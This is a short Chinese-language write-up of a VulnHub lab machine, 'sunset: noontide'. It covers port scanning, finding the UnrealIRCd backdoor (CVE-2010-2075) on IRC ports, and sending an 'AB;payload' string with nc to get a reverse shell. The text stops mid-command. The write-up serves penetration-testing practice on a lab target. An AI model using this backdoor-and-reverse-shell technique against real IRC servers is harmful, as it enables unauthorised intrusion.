sunset: noontide靶机渗透-vulnhub
前言
这台靶机(sunset: noontide)运行在Vmware中无法获取靶机IP,换VirtualBox后NAT和桥接模式下也未获取到IP,仅在host-only模式下才找到靶机IP…
一、IP端口探测
查看到开了3个端口,且都是irc相关服务
![在这里插入图片描述](https://i-blog.csdnimg.cn/blog_migrate/baddbfa993eef54002741d2615480b72.png)
二、6665端口利用
1.反弹shell
搜索相关漏洞
![在这里插入图片描述](https://i-blog.csdnimg.cn/blog_migrate/f513e6e439f57667c0f31ee392f93784.png)
查看16922和13853这2个脚本,发现是CVE-2010-2075
![在这里插入图片描述](https://i-blog.csdnimg.cn/blog_migrate/8b0cd9110193ca81e06e8de3b4eaeaea.png)
大致利用思路 是连接6667端口时直接插入 AB;payload
![在这里插入图片描述](https://i-blog.csdnimg.cn/blog_migrate/9ee508386f41b0de4d5b7cb42160b2db.png)
使用nc连接,并将payload修改为反弹shell,同时本地监听3333
nc -nv 192.168.56.103 66